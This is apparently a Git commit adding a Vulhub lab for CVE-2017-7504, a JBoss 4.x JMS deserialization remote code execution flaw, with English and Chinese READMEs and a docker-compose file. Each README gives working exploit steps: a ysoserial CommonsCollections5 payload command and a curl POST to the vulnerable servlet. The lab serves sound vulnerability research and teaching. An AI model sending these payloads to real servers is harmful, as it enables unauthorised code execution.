first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
jboss/CVE-2017-7504/1.png
Normal file
BIN
jboss/CVE-2017-7504/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 2.2 KiB |
38
jboss/CVE-2017-7504/README.md
Normal file
38
jboss/CVE-2017-7504/README.md
Normal file
@@ -0,0 +1,38 @@
|
||||
# JBoss 4.x JBossMQ JMS Deserialization Remote Code Execution (CVE-2017-7504)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Red Hat JBoss Application Server is a JavaEE-based open source application server. In JBoss AS 4.x and earlier versions, there is a deserialization vulnerability in the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in JBossMQ implementation. Remote attackers can exploit this vulnerability to execute arbitrary code by using specially crafted serialized data.
|
||||
|
||||
References:
|
||||
|
||||
- https://github.com/joaomatosf/JavaDeserH2HC
|
||||
- https://www.youtube.com/watch?v=jVMr4eeJ2Po
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following command to start JBoss AS 4.0.5:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment is started, the target will be available at `http://your-ip:8080`.
|
||||
|
||||
## Vulnerability Reproduce
|
||||
|
||||
This vulnerability exists in the `/jbossmq-httpil/HTTPServerILServlet` request. We can use the CommonsCollections5 exploitation chain from ysoserial to reproduce it. Generate the payload:
|
||||
|
||||
```
|
||||
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
|
||||
```
|
||||
|
||||
Send the content of 1.ser file as POST Body:
|
||||
|
||||
```
|
||||
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
|
||||
```
|
||||
|
||||
|
||||
|
||||
Execute `docker compose exec jboss bash` to enter the container, and you can see that `/tmp/success` has been successfully created.
|
||||
36
jboss/CVE-2017-7504/README.zh-cn.md
Normal file
36
jboss/CVE-2017-7504/README.zh-cn.md
Normal file
@@ -0,0 +1,36 @@
|
||||
# JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
|
||||
|
||||
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
|
||||
|
||||
参考:
|
||||
|
||||
- https://github.com/joaomatosf/JavaDeserH2HC
|
||||
- https://www.youtube.com/watch?v=jVMr4eeJ2Po
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动JBoss AS 4.0.5:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,目标为`http://your-ip:8080`。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
该漏洞出现在`/jbossmq-httpil/HTTPServerILServlet`请求中,我们借助ysoserial的eCommonsCollections5利用链来复现。生成Payload:
|
||||
|
||||
```
|
||||
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
|
||||
```
|
||||
|
||||
我们将1.ser文件内容作为POST Body发送:
|
||||
|
||||
```
|
||||
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
|
||||
```
|
||||
|
||||
|
||||
|
||||
执行`docker compose exec jboss bash`进入容器,可见`/tmp/success`已成功创建。
|
||||
5
jboss/CVE-2017-7504/docker-compose.yml
Normal file
5
jboss/CVE-2017-7504/docker-compose.yml
Normal file
@@ -0,0 +1,5 @@
|
||||
services:
|
||||
jboss:
|
||||
image: vulhub/jboss:as-4.0.5
|
||||
ports:
|
||||
- "8080:8080"
|
||||
Reference in New Issue
Block a user